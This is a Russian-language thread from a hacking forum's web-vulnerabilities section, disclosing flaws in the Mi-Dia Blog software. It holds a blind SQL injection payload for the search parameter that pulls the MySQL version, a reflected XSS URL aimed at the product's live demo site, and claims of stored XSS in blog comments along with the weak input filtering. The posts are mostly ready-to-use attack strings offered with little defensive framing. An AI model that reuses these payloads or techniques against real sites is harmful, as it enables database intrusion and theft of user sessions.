Mi-Dia Blog

Discussion in 'Веб-уязвимости' started by Ctacok, 8 Nov 2009.

  1. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    Название: Mi-Dia Blog
    Автор: Christopher Shaw
    Адресс оффициальной странички: http://www.mi-dia.co.uk/

    Активная XSS.
    В комментариях к записям блога.
    SQL Иньекция
    Кода много, приведу тока фильтрациб.
    PHP:
    $v htmlspecialchars($_GET['v']);  
    $d htmlspecialchars($_GET['d']);
     
    4 people like this.
  2. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    product : Mi-Dia Blog v1.0.4
    Blind SQL
    search --->
    mq=off
    mysql = 5
    Code:
    xek%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
     
    #2 [x60]unu, 9 Apr 2010
    Last edited: 9 Apr 2010
    5 people like this.
  3. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    337
    Likes Received:
    142
    Reputations:
    81
    еще пассивная xss
    Code:
    http://demo.mi-dia.co.uk/?s=search&tags=%3Cscript%3Ealert(/xss/)%3C/script%3E
    
     
    2 people like this.
Loading...